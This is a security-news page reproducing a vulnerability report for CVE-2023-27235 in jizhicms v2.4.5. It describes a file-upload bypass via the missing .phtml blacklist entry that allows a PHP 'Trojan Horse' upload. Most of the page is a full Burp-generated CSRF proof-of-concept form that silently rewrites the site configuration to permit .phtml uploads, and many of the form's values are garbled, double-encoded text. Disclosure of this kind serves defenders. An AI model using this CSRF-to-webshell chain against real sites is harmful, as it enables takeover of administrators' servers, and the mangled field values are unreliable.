Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27235: jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability · Issue #85 · Cherry-toto/jizhicms

An arbitrary file upload vulnerability in the \admin\c\CommonController.php component of Jizhicms v2.4.5 allows attackers to execute arbitrary code via a crafted phtml file.

CVE
Open in Source
#csrf#vulnerability#web#php#pdf

The file upload vulnerability file address:
\app\admin\c\CommonController.php
It can be seen that uploads uses the blacklist and whitelist verification method for the suffix of uploaded files, but the blacklist lacks the restriction on the suffix phtml, which causes the file upload suffix to be bypassed
For users who have logged in to the background, you can add a phtml to the file suffix in the whitelist, and then you can upload a sentence of the suffix phtml Trojan Horse

Visible file uploaded successfully and returned to the upload path

Repair method:Blacklist phtml files

The CSRF vulnerability :
After the administrator logged in, open the following page phtml will be included in the white list, and other configuration items can also be modified

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
      <input type="hidden" name="web&#95;name" value="�&#158;&#129;�&#135;&#180;CMS�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;keyword" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;&#44;cms&#44;�&#188;&#128;�&#144;cms&#44;�&#133;&#141;�&#180;&#185;cms&#44;cms�&#179;&#187;�&#187;&#159;&#44;phpcms&#44;�&#133;&#141;�&#180;&#185;�&#188;&#129;�&#184;&#154;�&#187;��&#171;&#153;&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#188;&#129;�&#184;&#154;cms&#44;jizhicms&#44;�&#158;&#129;�&#135;&#180;cms&#44;�&#187;��&#171;&#153;cms&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#158;&#129;�&#135;&#180;�&#141;&#154;�&#174;&#162;&#44;�&#158;&#129;�&#135;&#180;blog&#44;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;desc" value="�&#158;&#129;�&#135;&#180;CMS�&#152;&#175;�&#188;&#128;�&#144;�&#133;&#141;�&#180;&#185;�&#154;&#132;PHPCMS�&#189;&#145;�&#171;&#153;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;�&#188;&#140;�&#151;&#160;�&#149;&#134;�&#184;&#154;�&#142;&#136;�&#157;&#131;�&#188;&#140;�&#174;&#128;�&#141;&#149;�&#152;&#147;�&#148;&#168;�&#188;&#140;�&#143;&#144;�&#190;&#155;�&#184;&#176;�&#175;&#140;�&#154;&#132;�&#143;&#146;�&#187;&#182;�&#188;&#140;�&#184;&#174;�&#130;&#168;�&#174;&#158;�&#142;&#176;�&#155;&#182;�&#159;��&#161;&#128;�&#144;&#173;�&#187;��&#184;&#141;�&#144;&#140;�&#177;&#187;�&#158;&#139;�&#189;&#145;�&#171;&#153;�&#188;&#136;�&#188;&#129;�&#184;&#154;�&#171;&#153;�&#188;&#140;�&#151;&#168;�&#136;&#183;�&#171;&#153;�&#188;&#140;�&#184;�人�&#141;&#154;�&#174;&#162;�&#171;&#153;�&#173;&#137;�&#188;&#137;�&#188;&#140;�&#152;&#175;�&#130;&#168;�&#187;��&#171;&#153;�&#154;&#132;�&#165;&#189;�&#184;&#174;�&#137;&#139;�&#128;&#130;�&#158;&#129;�&#128;&#159;�&#187;��&#171;&#153;�&#188;&#140;�&#176;&#177;�&#128;&#137;�&#158;&#129;�&#135;&#180;CMS�&#128;&#130;" />
      <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" />
      <input type="hidden" name="web&#95;beian" value="�&#134;&#128;ICP�&#164;&#135;88888�&#143;&#183;" />
      <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" />
      <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" />
      <input type="hidden" name="web&#95;qq" value="12345678" />
      <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="web&#95;address" value="�&#178;&#179;�&#140;&#151;�&#156;&#129;�&#187;&#138;�&#157;&#138;�&#184;&#130;�&#185;&#191;�&#152;&#179;�&#140;�xxx�&#164;&#167;�&#142;&#166;xx�&#165;&#188;001�&#143;&#183;" />
      <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="domain" value="" />
      <input type="hidden" name="mingan" value="" />
      <input type="hidden" name="closeweb" value="0" />
      <input type="hidden" name="closetip" value="�&#138;&#177;�&#173;&#137;�&#188;&#129;�&#175;&#165;�&#171;&#153;�&#130;&#185;�&#183;&#178;�&#187;&#143;�&#162;&#171;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#129;&#156;�&#173;&#162;�&#191;&#144;�&#161;&#140;�&#188;&#140;�&#175;&#183;�&#129;&#148;�&#179;&#187;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#134;�&#167;&#163;�&#175;&#166;�&#131;&#133;�&#188;&#129;" />
      <input type="hidden" name="web&#95;phone" value="0" />
      <input type="hidden" name="web&#95;weixin" value="" />
      <input type="hidden" name="pc&#95;template" value="cms" />
      <input type="hidden" name="wap&#95;template" value="cms" />
      <input type="hidden" name="weixin&#95;template" value="cms" />
      <input type="hidden" name="iswap" value="1" />
      <input type="hidden" name="isopenhomeupload" value="1" />
      <input type="hidden" name="isopenhomepower" value="0" />
      <input type="hidden" name="cache&#95;time" value="0" />
      <input type="hidden" name="fileSize" value="0" />
      <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" />
      <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#44;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" />
      <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" />
      <input type="hidden" name="classtypemaxlevel" value="0" />
      <input type="hidden" name="onlyuserupload" value="1" />
      <input type="hidden" name="imagequlity" value="75" />
      <input type="hidden" name="ispngcompress" value="0" />
      <input type="hidden" name="admintpl" value="default" />
      <input type="hidden" name="islevelurl" value="0" />
      <input type="hidden" name="iscachepage" value="1" />
      <input type="hidden" name="isautohtml" value="0" />
      <input type="hidden" name="pc&#95;html" value="&#47;" />
      <input type="hidden" name="mobile&#95;html" value="m" />
      <input type="hidden" name="autocheckmessage" value="0" />
      <input type="hidden" name="autocheckcomment" value="1" />
      <input type="hidden" name="iswatermark" value="0" />
      <input type="hidden" name="watermark&#95;file" value="" />
      <input type="hidden" name="watermark&#95;t" value="9" />
      <input type="hidden" name="watermark&#95;tm" value="0" />
      <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="isajax" value="0" />
      <input type="hidden" name="isregister" value="1" />
      <input type="hidden" name="onlyinvite" value="0" />
      <input type="hidden" name="release&#95;table" value="article&#124;product" />
      <input type="hidden" name="closehomevercode" value="0" />
      <input type="hidden" name="closeadminvercode" value="0" />
      <input type="hidden" name="tag&#95;table" value="article&#124;product" />
      <input type="hidden" name="isdebug" value="1" />
      <input type="hidden" name="closesession" value="0" />
      <input type="hidden" name="messageyzm" value="1" />
      <input type="hidden" name="homerelease" value="1" />
      <input type="hidden" name="hideclasspath" value="0" />
      <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" />
      <input type="hidden" name="cachefilenum" value="100" />
      <input type="hidden" name="search&#95;table" value="article&#124;product" />
      <input type="hidden" name="search&#95;words" value="title" />
      <input type="hidden" name="search&#95;words&#95;muti" value="title" />
      <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" />
      <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" />
      <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" />
      <input type="hidden" name="email&#95;port" value="465" />
      <input type="hidden" name="shou&#95;email" value="" />
      <input type="hidden" name="send&#95;email" value="" />
      <input type="hidden" name="send&#95;pass" value="" />
      <input type="hidden" name="send&#95;name" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="tj&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#187;&#143;�&#148;&#182;�&#136;&#176;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#129;�&#175;&#183;�&#149;&#153;�&#132;&#143;�&#130;&#168;�&#154;&#132;�&#148;��&#173;&#144;�&#130;&#174;�&#187;&#182;�&#187;&#165;�&#142;&#183;�&#190;&#151;�&#156;&#128;�&#150;&#176;�&#182;&#136;�&#129;&#175;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#188;&#129;" />
      <input type="hidden" name="send&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#161;&#174;�&#174;&#164;�&#134;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#140;�&#175;&#183;�&#142;3�&#151;&#165;�&#134;&#133;�&#177;&#135;�&#172;&#190;�&#188;&#140;�&#128;&#190;�&#156;&#159;�&#129;&#149;�&#184;&#141;�&#191;&#157;�&#149;&#153;�&#188;&#140;�&#184;&#141;�&#190;&#191;�&#175;&#183;�&#167;&#129;�&#176;&#133;�&#128;&#130;�&#177;&#135;�&#172;&#190;�&#174;&#140;�&#136;&#144;�&#144;&#142;�&#188;&#140;�&#131;&#166;�&#175;&#183;�&#145;&#138;�&#159;&#165;�&#174;&#162;�&#156;&#141;人�&#145;&#152;�&#130;&#168;�&#154;&#132;�&#164;�&#152;&#147;�&#180;&#166;�&#143;&#183;�&#144;&#142;�&#148;�&#189;&#141;�&#188;&#140;�&#141;&#179;�&#174;&#140;�&#136;&#144;�&#184;&#139;�&#141;&#149;�&#137;&#139;�&#187;&#173;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#128;&#130;" />
      <input type="hidden" name="yunfei" value="0&#46;00" />
      <input type="hidden" name="overtime" value="4" />
      <input type="hidden" name="isopenemail" value="1" />
      <input type="hidden" name="paytype" value="0" />
      <input type="hidden" name="alipay&#95;partner" value="" />
      <input type="hidden" name="alipay&#95;key" value="" />
      <input type="hidden" name="alipay&#95;private&#95;key" value="" />
      <input type="hidden" name="alipay&#95;public&#95;key" value="" />
      <input type="hidden" name="wx&#95;mchid" value="" />
      <input type="hidden" name="wx&#95;key" value="" />
      <input type="hidden" name="wx&#95;appid" value="" />
      <input type="hidden" name="wx&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;client&#95;cert" value="" />
      <input type="hidden" name="wx&#95;client&#95;key" value="" />
      <input type="hidden" name="wx&#95;token" value="" />
      <input type="hidden" name="money&#95;exchange" value="1" />
      <input type="hidden" name="jifen&#95;exchange" value="100" />
      <input type="hidden" name="isopenjifen" value="1" />
      <input type="hidden" name="isopenqianbao" value="1" />
      <input type="hidden" name="isopenweixin" value="1" />
      <input type="hidden" name="isopenzfb" value="1" />
      <input type="hidden" name="isopendmf" value="1" />
      <input type="hidden" name="wx&#95;login&#95;appid" value="" />
      <input type="hidden" name="wx&#95;login&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;login&#95;token" value="" />
      <input type="hidden" name="huanying" value="�&#172;&#162;�&#191;&#142;�&#133;&#179;�&#179;&#168;�&#133;&#172;�&#188;&#151;�&#143;&#183;&#126;" />
      <input type="hidden" name="login&#95;award" value="1" />
      <input type="hidden" name="login&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award" value="1" />
      <input type="hidden" name="release&#95;max&#95;award" value="0" />
      <input type="hidden" name="collect&#95;award&#95;open" value="1" />
      <input type="hidden" name="collect&#95;award" value="1" />
      <input type="hidden" name="collect&#95;max&#95;award" value="1000" />
      <input type="hidden" name="likes&#95;award&#95;open" value="1" />
      <input type="hidden" name="likes&#95;award" value="1" />
      <input type="hidden" name="likes&#95;max&#95;award" value="1000" />
      <input type="hidden" name="comment&#95;award&#95;open" value="1" />
      <input type="hidden" name="comment&#95;award" value="1" />
      <input type="hidden" name="comment&#95;max&#95;award" value="1000" />
      <input type="hidden" name="follow&#95;award&#95;open" value="1" />
      <input type="hidden" name="follow&#95;award" value="1" />
      <input type="hidden" name="follow&#95;max&#95;award" value="1000" />
      <input type="hidden" name="invite&#95;award&#95;open" value="0" />
      <input type="hidden" name="invite&#95;type" value="jifen" />
      <input type="hidden" name="invite&#95;award" value="0" />
      <input type="hidden" name="custom&#95;type" value="0" />
      <input type="hidden" name="custom&#95;title" value="" />
      <input type="hidden" name="custom&#95;fields" value="" />
      <input type="hidden" name="custom&#95;ctype" value="1" />
      <input type="hidden" name="custom&#95;tips" value="" />
      <input type="hidden" name="custom&#95;config" value="" />
      <input type="hidden" name="custom&#95;new&#95;title" value="" />
      <input type="hidden" name="custom&#95;new&#95;fields" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE